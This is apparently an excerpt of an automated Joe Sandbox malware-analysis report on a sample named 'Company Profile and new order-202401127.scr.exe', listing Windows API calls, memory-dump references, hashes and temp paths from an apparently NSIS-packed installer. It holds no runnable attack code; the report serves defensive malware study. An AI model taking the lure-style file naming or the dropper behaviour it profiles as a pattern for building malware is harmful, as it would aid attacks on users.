                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                            • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                            • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                            • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                            APIs
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 1354259210-0
                                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                            • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                            • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                                                            • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                            • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401E56
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                            • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                                                            • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                            • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                            • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                                                            • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                            • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                            • wsprintfW.USER32 ref: 00404DF7
                                                                                            • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                            • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                                                            • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                            • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                                                            APIs
                                                                                              • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405EA9
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405F51
                                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp
                                                                                            • API String ID: 3248276644-1425895426
                                                                                            • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                            • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                            • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                            • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405EA9
                                                                                            • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                            • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp, xrefs: 00405E9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp
                                                                                            • API String ID: 3213498283-1133808960
                                                                                            • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                                                                                            • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-823278215
                                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                            • GetTickCount.KERNEL32 ref: 0040304F
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                            • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                            • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                            • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00405549
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                              • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
